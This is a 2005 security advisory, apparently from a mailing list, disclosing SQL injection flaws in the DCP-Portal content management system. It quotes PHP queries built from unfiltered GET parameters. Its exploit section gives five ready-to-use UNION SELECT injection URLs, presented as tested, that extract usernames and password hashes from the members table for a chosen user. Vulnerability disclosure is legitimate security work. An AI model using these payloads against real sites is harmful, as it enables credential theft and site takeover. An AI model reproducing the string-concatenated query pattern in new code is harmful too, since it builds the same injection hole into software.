<<< Date Index >>>     <<< Thread Index >>>

[hackgen-2005-#003] - SQL injection bugs in DCP-Portal




http://www.hackgen.org/advisories/hackgen-2005-003.txt

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'                          [hackgen-2005-#003]                       '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'                    SQL injection bugs in DCP-Portal                '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
  
  Software: DCP-Portal <= 6.1.1
  Homepage: http://www.dcp-portal.org
  Author: "Exoduks" - HackGen Team
  Release Date: 16 March, 2005
  Website: www.hackgen.org
  Mail: exoduks [at] gmail . com
  
 

 0x01 - Affected software description:
 -------------------------------------
 DCP-Portal is a content management system with advanced features like web 
 based update, link, file, member management, poll, calendar, content informer, 
 content sending by members etc. Features: Admin panel to manage the entire 
site; 
 HTML editor to add news and content; Members can submit news and contents, and 
 write reviews; Members can receive the added content in e-mail; Mailing list; 
 Search engine; Content categories; FAQ; Easy setup; Multi-language support; 
Forum; 
 Message system; member agenda; Ad management. Site design can be changed with 
just 
 one template file, publish in homepage option, .txt file import for contents, 
 featured module, works with register_globals=off..                    



 0x02 - Vulnerability Discription:
 ---------------------------------
 Vulnerabilities exist in prety much all sql queries, some of them are in 
index.php
 and forums.php. There isn't eny filtering for input string in all $_GET and 
$_POST
 variables. So it is possible to input evil sql query that will give us for 
example 
 hashed password of user we want. This bug is very critical because we can get 
and 
 admin password. So some evil user deface portal, or delate all database. This 
can 
 be exploited if magic_quotes_gpc is set to Off in php.ini 


 0x03 - Vulnerability Code:
 --------------------------
 Vulnerability code in index.php

 ----- beging the code in index.php -----
  ....
  $result = mysql_query("SELECT * FROM  $t_members WHERE uid = 
'".$_GET["uid"]."' AND hideinfo != '1' ORDER BY username");
  ....
  $sql = mysql_query("SELECT id, name, content FROM $t_faq WHERE cat_id = 
'".$_GET["lcat"]."' ORDER BY name");
  ....
  $sql = mysql_query("SELECT id, name FROM $t_links WHERE cat_id = 
'".$_GET["lcat"]."' ORDER BY name");
  ....
  $result = mysql_query("SELECT * FROM $t_docs WHERE cat_id = 
'".$_GET["dcat"]."' AND active = '1' ORDER BY date DESC");
  ....
 ----- end of the code -----

Vulnerability code in forums.php

 ----- beging the code in forums.php -----
  ....
  $result = mysql_query("SELECT * FROM $t_forums WHERE fid = 
'".$_GET["bid"]."'");
  ....
  $result = mysql_query("SELECT * FROM $t_forum_msg WHERE tid = 
'".$_GET["mid"]."'");
  ....
 ----- end of the code -----



 0x04 - How to fix this bug:
 ---------------------------
 Vendor has beed contacted and he we probably publish new version of portal so 
go to 
 http://www.dcp-portal.org and look for new version.



 0x05 - Exploit:
 ----------------

 http://server.com/index.php?page=links&catid=1&lcat=-99%27 UNION SELECT 
null,password FROM 
 dcp5_members WHERE username=%27[username]

 http://server.com/index.php?page=documents&doc=-99%27 UNION SELECT 
null,null,username,password,
 null,null,null,null,null,null,null,null FROM dcp5_members WHERE 
username=%27[username]

 http://server.com/index.php?page=mdetails&uid=-99%27 UNION SELECT 
null,null,null,username,null,
 
null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null
 FROM dcp5_members 
 WHERE username=%27[username]

 http://server.com/forums.php?action=showmsg&mid=-99%27 UNION SELECT 
null,null,null,password,null,
 username,null,null,null FROM dcp5_members WHERE username=%27[username]

 http://server.com/forums.php?action=board&bid=-99%27UNION SELECT 
null,null,password,null FROM 
 dcp5_members WHERE username=%27[username]

 Replace [username] with username which you want to get password for and if you 
need change 
 dcp5_ prefix. I have tested this on DCP-Portal v6.1.1 and it works !

 0x006 - The End:
 ----------------
 And you have come to end. My threed advisor is out. 
 Grejtttzz to: All people who are working on phearless zine which can be readed 
on
 http://phearless.headcoders.net 



                         ______________________________________
                          Written By Exoduks - www.hackgen.org